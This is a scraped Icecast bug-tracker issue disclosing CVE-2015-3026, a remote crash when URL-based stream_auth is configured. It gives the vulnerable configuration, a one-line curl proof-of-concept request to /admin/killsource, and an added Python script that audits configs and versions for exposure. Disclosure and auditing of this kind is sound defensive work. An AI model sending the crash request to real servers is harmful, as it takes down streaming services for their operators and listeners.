Xiph.Org issues
https://gitlab.xiph.org/groups/xiph/-/issues

Icecast can be crashed remotely if stream_auth is enabled.
https://gitlab.xiph.org/xiph/icecast-server/-/issues/2191
2018-04-16T22:12:13Z
Thomas B. Rücker

Downstream bug report:
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=782120
Icecast can be killed by anyone with a simple HTTP request when
<authentication type="url"> is used and a stream_auth handler is
defined.
Example configuration:
```
<mount>
    <mount-name>/test.ogg</mount-name>
    <authentication type="url">
        <option name="stream_auth" value="http://localhost/auth"/>
    </authentication>
</mount>
```
Proof of concept exploit:
```
curl "http://stream.example.org:8000/admin/killsource?mount=/test.ogg"
```
This happens if no logon credentials are sent with the request. The crash happens regardless of a source client being connected to the vulnerable mountpoint.
This will be released in a security release 2.4.2 today.
CVE-2015-3026
Icecast 2.4.2
Thomas B. Rücker
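
As an added example (not part of the original report and not Icecast project code): a small audit that lists the mounts in an `icecast.xml` matching the configuration described above and flags an installation older than the 2.4.2 release named in the report. The function names, the sample config and the plain dotted version string are assumptions.

```python
import xml.etree.ElementTree as ET

FIXED_VERSION = (2, 4, 2)  # release the report names as carrying the fix

# Constructed sample config: the report's mount plus two that do not match.
SAMPLE_CONFIG = """<icecast>
  <mount>
    <mount-name>/test.ogg</mount-name>
    <authentication type="url">
      <option name="stream_auth" value="http://localhost/auth"/>
    </authentication>
  </mount>
  <mount>
    <mount-name>/listeners-only.ogg</mount-name>
    <authentication type="url">
      <option name="listener_add" value="http://localhost/listener"/>
    </authentication>
  </mount>
  <mount>
    <mount-name>/open.ogg</mount-name>
  </mount>
</icecast>"""


def stream_auth_mounts(config_xml):
    """Return (mount-name, handler URL) for each mount using URL auth with stream_auth."""
    root = ET.fromstring(config_xml)
    hits = []
    for mount in root.iter("mount"):
        name = (mount.findtext("mount-name") or "").strip()
        for auth in mount.findall("authentication"):
            if (auth.get("type") or "").strip().lower() != "url":
                continue
            for opt in auth.findall("option"):
                if (opt.get("name") or "").strip() == "stream_auth":
                    hits.append((name, opt.get("value", "")))
    return hits


def needs_upgrade(version, config_xml):
    """True if the version is older than the fixed release and a matching mount exists."""
    # Assumes a plain dotted numeric version such as "2.4.1" (hypothetical input format).
    parsed = tuple(int(part) for part in version.split("."))
    return parsed < FIXED_VERSION and bool(stream_auth_mounts(config_xml))


if __name__ == "__main__":
    for name, handler in stream_auth_mounts(SAMPLE_CONFIG):
        print(f"{name}: stream_auth -> {handler}")
    print("upgrade needed on 2.4.1:", needs_upgrade("2.4.1", SAMPLE_CONFIG))
```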